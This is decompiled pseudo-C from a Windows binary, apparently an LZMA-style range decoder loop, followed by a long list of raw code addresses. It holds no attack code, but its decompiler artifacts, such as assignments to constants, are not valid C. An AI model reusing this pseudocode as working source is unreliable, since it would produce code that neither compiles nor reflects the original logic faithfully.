								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x00406333
                                                  0x00406333
                                                  0x00406338
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00000000
                                                  0x00406ba3
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00000000
                                                  0x00406a12
                                                  0x0040633a
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c8
                                                  0x004065cb
                                                  0x0040656e
                                                  0x00406574
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004065cd
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x00000000
                                                  0x0040656b
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406477
                                                  0x0040647a
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f7
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x00406504
                                                  0x00406507
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064a7
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x004066de
                                                  0x004066de
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406480
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00406bb9
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00406bd5
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x00000000
                                                  0x004063ee
                                                  0x0040647a
                                                  0x00406383
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x00000000
                                                  0x0040699c
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00000000
                                                  0x00406b0f
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
